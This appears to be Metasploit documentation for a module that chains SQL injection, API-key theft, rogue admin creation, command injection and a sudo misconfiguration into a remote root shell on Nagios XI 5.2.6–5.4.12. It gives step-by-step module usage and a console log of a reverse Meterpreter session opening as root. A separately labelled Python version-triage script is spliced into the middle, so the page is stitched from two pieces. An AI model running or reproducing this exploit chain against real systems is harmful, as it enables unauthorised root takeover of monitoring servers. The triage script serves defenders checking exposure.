## Vulnerable Application
  Nagios XI 5.2.6 - 5.4.12 Chained Remote Root RCE

  This exploit combines many different vulnerabilities in Nagios XI to
  gain remote root access to the affected host. The process is:

  1. Reset the database user to root.
  2. Exploit SQL injection to extract API keys.
  3. Use an API key to add an administrative user.
  4. Authenticate to the application using the newly added user.
  5. Exploit command injection and sudo misconfiguration
     to get remote root shell.
  6. Remove added admin user, and reset database user.

  See [our blog post](http://blog.redactedsec.net/exploits/2018/04/26/nagios.html) for more information.
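For triage on the defending side, the affected range stated above (5.2.6 through 5.4.12) can be checked against an inventory of Nagios XI version strings. This is an added example, not part of the module or the original write-up; the hostnames and inventory format are constructed assumptions.

```python
import re

# Affected range as stated on this page: Nagios XI 5.2.6 through 5.4.12.
FIRST_AFFECTED = (5, 2, 6)
LAST_AFFECTED = (5, 4, 12)

# Exactly three dotted numeric components, not embedded in a longer version.
_VERSION_RE = re.compile(r"(?<![\d.])(\d+)\.(\d+)\.(\d+)(?![\d.])")


def parse_version(text):
    """Return (major, minor, patch) from a version string, or None."""
    match = _VERSION_RE.search(text or "")
    return tuple(int(part) for part in match.groups()) if match else None


def classify(version_text):
    """Return 'affected', 'not-in-range', or 'unknown' for one version string."""
    version = parse_version(version_text)
    if version is None:
        # Unparseable versions are surfaced for manual review, not assumed safe.
        return "unknown"
    # Tuple comparison is numeric, so 5.10.1 sorts after 5.4.12
    # (a plain string comparison would get this wrong).
    if FIRST_AFFECTED <= version <= LAST_AFFECTED:
        return "affected"
    return "not-in-range"


def triage(inventory):
    """Map each host to its classification, given {host: version string}."""
    return {host: classify(version) for host, version in inventory.items()}


# Constructed sample inventory (hostnames and versions are made up).
SAMPLE_INVENTORY = {
    "mon-01.example.internal": "5.2.7",
    "mon-02.example.internal": "Nagios XI 5.4.12",
    "mon-03.example.internal": "5.4.13",
    "mon-04.example.internal": "5.2.5",
    "mon-05.example.internal": "5.10.1",
    "mon-06.example.internal": "unknown build",
}

if __name__ == "__main__":
    for host, status in sorted(triage(SAMPLE_INVENTORY).items()):
        print(f"{host}\t{SAMPLE_INVENTORY[host]}\t{status}")
```

A `not-in-range` result only means the version falls outside the range this page names; it says nothing about other issues in that release.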

## Verification Steps

  1. `use exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo`
  2. `set rhost <IP>`
  3. `exploit`
  4. A Meterpreter session should open successfully.

## Scenarios

### Nagios 5.2.7 on CentOS 6.7

```
msf5 > use exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo
msf5 exploit(linux/http/nagios_xi_chained_rce_2_electric_boogaloo) > set rhost 172.22.222.182
rhost => 172.22.222.182
msf5 exploit(linux/http/nagios_xi_chained_rce_2_electric_boogaloo) > run

[*] Started reverse TCP handler on 172.22.222.177:4444
[*] Command Stager progress - 100.00% done (705/705 bytes)
[*] Sending stage (857352 bytes) to 172.22.222.182
[*] Meterpreter session 1 opened (172.22.222.177:4444 -> 172.22.222.182:35262) at 2018-06-29 11:04:03 -0500

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 6.9 (Linux 2.6.32-696.10.2.el6.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 
```
